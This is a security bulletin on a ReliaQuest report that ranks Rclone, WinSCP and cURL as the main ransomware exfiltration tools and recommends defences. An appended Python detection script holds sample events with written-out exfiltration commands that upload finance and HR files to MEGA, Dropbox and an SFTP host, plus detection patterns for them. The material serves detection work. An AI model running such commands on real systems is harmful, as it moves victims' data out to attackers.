Threat Actors Favor Rclone, WinSCP and cURL as Data Exfiltration Tools
Summary:
Data exfiltration has become a key component in double extortion ransomware attacks, which are now a prevalent method used by cybercriminals. According to a new report by ReliaQuest, the top three tools used for data exfiltration between September 2023 and July 2024 are Rclone, WinSCP, and cURL. Data exfiltration involves the unauthorized transfer of data from enterprise or personal devices, often through threat actor–owned infrastructure or third-party cloud services. Cybercriminals use these tools to collect and extract large amounts of data, threatening to leak it if the victim doesn't pay the ransom.
Rclone, an open-source command-line utility, is the most widely used exfiltration tool, involved in 57% of ransomware incidents during the reported period. Its popularity stems from its fast data-transfer capabilities, cross-platform support, and ability to integrate with numerous cloud services, making it difficult for defenders to mitigate.
WinSCP, another open-source file transfer utility, is known for its user-friendly interface and is trusted by organizations, making it less likely to raise suspicion when found on a system. It offers efficient data transfers with robust error handling and logging features.
cURL, a command-line tool that transfers data via URLs, is often used for interacting with web services and is native to Windows 10, allowing attackers to use it without needing to install additional software. While not as reliable for large-scale data exfiltration as Rclone and WinSCP, cURL is effective for extracting critical information.
Security Officer Comments:
ReliaQuest also notes that other tools, such as MEGA Cloud Storage, FileZilla, Restic, and remote monitoring and management (RMM) software, are used by cybercriminals for data exfiltration.
Suggested Corrections:
ReliaQuest recommends the following measures to prevent or reduce the impact of data-exfiltration attempts:
- Application control: Organizations should enforce application controls through Group Policy Objects (GPOs) or other means to prevent the execution of unauthorized applications, including those capable of exfiltrating data.
- Restricting access to abused commercial services: Threat actors frequently exploit commercial services to appear legitimate and blend into the target environment, bypassing reputation-based controls. In most of the incidents ReliaQuest responded to, threat actors used widely available services like MEGA cloud storage and Dropbox for data exfiltration. Organizations should identify the services in use and implement corresponding restrictions, such as categorical restrictions on their proxy or DNS and limitations on RMM software via application control.
- Logging and visibility: Security teams can only act on what they can see within their environment. It is crucial to ensure that critical infrastructure and the broader environment forward activity logs to a centralized location. This logging and visibility allow security teams to implement correlation-based detection rules, investigate threats, and rapidly respond to and contain incidents involving exfiltration tools.
- Use of canary files: Canary files or folders serve as decoys placed within an environment to detect unauthorized operations. These files or folders are presented as valuable and act as traps for threat actors. Implementation of canary files allows security teams to establish rules to detect modifications and respond rapidly, reducing potential damage from an exfiltration attempt.
- Implement data loss prevention (DLP) tools: Organizations should deploy DLP tools to identify, classify, and monitor sensitive data to protect against unauthorized access. DLP tools can integrate with directory services and apply role-based access controls, enabling the creation of custom policies for specific user groups.
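As an added illustration of the correlation-based detection that the logging recommendation above refers to (this is not code from the ReliaQuest report or the article), the following Python triages constructed process-creation events and flags Rclone, WinSCP and cURL invocations that carry upload semantics or point at the abused commercial services named above. The service hostnames, rclone remote names, command-line markers and the sample events are assumptions made for the example.

```python
import json
import re
from pathlib import PureWindowsPath
from typing import Dict, List, Optional

# The three tools the report names as the most used exfiltration utilities.
EXFIL_TOOLS = {"rclone.exe", "winscp.exe", "curl.exe"}
# Commercial services the report says are abused (hostnames are an assumption).
ABUSED_SERVICES = ("mega.nz", "mega.io", "mega.co.nz", "dropbox.com")
# Per-tool command-line markers that indicate an upload rather than a download.
UPLOAD_MARKERS = {
    "rclone.exe": re.compile(r"\b(copy|sync|move|copyto|moveto)\b", re.I),
    "winscp.exe": re.compile(r"\b(put|synchronize\s+remote)\b", re.I),
    "curl.exe": re.compile(r"(?:^|\s)(-T|--upload-file|-F|--form|--data-binary)(?:\s|=)"),
}

# Constructed sample of process-creation events as JSON lines; not real telemetry.
SAMPLE_EVENTS = r"""
{"ts": "2024-07-01T02:13:05Z", "host": "FS01", "user": "CORP\\svc_patch", "image": "C:\\Windows\\System32\\curl.exe", "cmdline": "curl.exe -s https://updates.example.com/manifest.json -o manifest.json"}
{"ts": "2024-07-01T02:14:10Z", "host": "FS01", "user": "CORP\\jdoe", "image": "C:\\Temp\\rclone.exe", "cmdline": "rclone.exe copy D:\\Finance mega:share --transfers 16"}
{"ts": "2024-07-01T02:20:41Z", "host": "FS01", "user": "CORP\\jdoe", "image": "C:\\Program Files (x86)\\WinSCP\\WinSCP.exe", "cmdline": "WinSCP.exe /command \"open sftp://u@203.0.113.10/\" \"put D:\\HR\\*\" exit"}
{"ts": "2024-07-01T02:25:03Z", "host": "WS22", "user": "CORP\\jdoe", "image": "C:\\Windows\\System32\\curl.exe", "cmdline": "curl.exe -T C:\\Users\\jdoe\\archive.zip https://www.dropbox.com/upload"}
{"ts": "2024-07-01T02:26:00Z", "host": "WS22", "user": "CORP\\jdoe", "image": "C:\\Windows\\System32\\notepad.exe", "cmdline": "notepad.exe C:\\notes.txt"}
"""


def triage_event(event: Dict[str, str]) -> Optional[Dict[str, str]]:
    """Return a finding for one event, or None when the event looks benign."""
    tool = PureWindowsPath(event["image"]).name.lower()
    if tool not in EXFIL_TOOLS:
        return None
    cmdline = event.get("cmdline", "")
    uploads = bool(UPLOAD_MARKERS[tool].search(cmdline))
    abused = [svc for svc in ABUSED_SERVICES if svc in cmdline.lower()]
    # rclone addresses cloud backends as "name:" remotes rather than hostnames.
    remote = re.search(r"\b(mega|dropbox|drive|onedrive|s3|b2):", cmdline, re.I)
    if remote:
        abused.append(remote.group(1).lower() + " remote")
    if not uploads and not abused:
        return None  # e.g. cURL fetching an update: native tool, no upload semantics
    severity = "high" if uploads and abused else "medium"
    reason = "upload via " + tool + (" to " + ", ".join(abused) if abused else "")
    return {"ts": event["ts"], "host": event["host"], "user": event["user"],
            "tool": tool, "severity": severity, "reason": reason}


def scan(jsonl: str) -> List[Dict[str, str]]:
    """Run triage_event over every JSON line and keep only the findings."""
    events = (json.loads(line) for line in jsonl.strip().splitlines())
    return [f for f in map(triage_event, events) if f]
```

Against the sample, the cURL download and Notepad events produce no finding, the WinSCP `put` to an unlisted host is medium, and the Rclone and cURL uploads to MEGA and Dropbox are high; in practice the "medium" tier is where a correlation with a canary-file read or a spike in outbound bytes would escalate the alert.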
Link(s):
https://www.infosecurity-magazine.com/news/rclone-winscp-curl-top-data/